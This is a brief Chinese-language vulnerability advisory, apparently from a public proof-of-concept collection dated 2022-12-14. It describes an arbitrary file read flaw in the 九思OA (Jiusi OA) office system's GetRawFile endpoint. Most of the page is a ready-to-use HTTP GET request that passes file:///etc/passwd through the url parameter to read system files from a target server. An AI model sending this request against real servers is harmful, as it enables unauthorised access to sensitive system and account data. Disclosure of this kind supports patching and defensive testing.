九思OA GetRawFile 任意文件读取漏洞

2022-12-14 九思OA PoC Public

Description

九思OA系统是安装、实施、学习、操作、维护的OA系统。 九思OA系统存在任意文件读取漏洞。允许攻击者利用漏洞获取敏感信息。

PoC

GET /jsoa/GetRawFile?url=file:///etc/passwd HTTP/1.1
Host: 
Accept: */*

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities